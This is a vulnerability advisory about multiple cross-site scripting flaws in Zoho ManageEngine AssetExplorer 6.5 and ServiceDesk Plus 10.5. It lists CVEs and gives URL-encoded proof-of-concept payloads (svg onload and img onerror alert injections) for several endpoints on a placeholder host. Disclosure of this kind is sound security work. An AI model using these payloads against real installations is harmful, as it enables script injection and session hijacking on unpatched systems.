Zoho ManageEngine AssetExplorer Multiple Cross Site Scripting Vulnerabilities

Summary

An issue Cross-Site Scripting vulnerability was discovered in Zoho ManageEngine AssetExplorer.

Credit:

The information has been provided by The Tarantula Team

The original article can be found at:

https://github.com/tarantula-team/Multiple-Cross-Site-Scripting-vulnerabilities-in-Zoho-ManageEngine


Details

Zoho ManageEngine AssetExplorer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

Zoho ManageEngine ServiceDesk Plus 10.5 Cross-Site Scripting vulnerability

Payload: Sent HTTP POST Request to: https://victim.com/SearchN.do with the following payload:

searchText=%27%3E%3Csvg+onload%3Dalert%28%27xss%27%29%3E&subModSelText=&selectName=Purchase&selectName=Purchase&selectedName=Purchase&submitbutton=GO
CVE-2019-12540

Zoho ManageEngine ServiceDesk Plus 10.5 Cross-Site Scripting vulnerability

Payload:

https://victim.com/WorkOrder.do?woMode=viewWO5%27%3balert(%27XSS%27)%2f%2f

Zoho ManageEngine AssetExplorer 6.5 Cross-Site Scripting vulnerability

Payload:

https://victim.com/RCSettings.do?rdsName=Windows%20Remote%20Desktop%00zc6p3%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Ekgo&description=This+tool+uses+the+windows+utility+%27mstsc%27+to+take+remote+and+it+is+available+by+default+in+windows+machines.&OS_COMMAND_1=mstsc+%2Fv%3A%24DEVICENAME&OS_TARGET_1_1=1&OS_COMMAND_2=&saveRds=Save&rdsId=2

Zoho ManageEngine AssetExplorer 6.5 Cross-Site Scripting vulnerability

Payload:

https://victim.com/SoftwareListView.do?softwareManufacturer=-1&site=-1&swType=488529);alert(%27XSS%27)%2f%2f298&swComplianceType=0&fromSoftwareHome=true&showZeroCount=false

Zoho ManageEngine AssetExplorer 6.5 Cross-Site Scripting vulnerability

Payload:

https://victim.com/asset/ResourcesAttachments.jsp?type=new&wsID=87&date=1559400074944&pageName=a%22%3E%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E

Zoho ManageEngine AssetExplorer 6.5 Cross-Site Scripting vulnerability

Payload:

Sent HTTP POST Request to: https://victim.com/SearchN.do with the following payload:

selectName=Purchase&searchText=%27%3E%3Csvg+onload%3Dalert%28%27xss%27%29%3E&submitbutton=%C2%A0

Vulnerable Systems:

Zohocorp Manageengine Assetexplorer 6.5 Build 6501
Zohocorp Manageengine Assetexplorer 6.5 Build 6500

CVE Information:

CVE-2019-12595
CVE-2019-12596
CVE-2019-12597
CVE-2019-12537

Disclosure Timeline:
Published Date:07/16/2019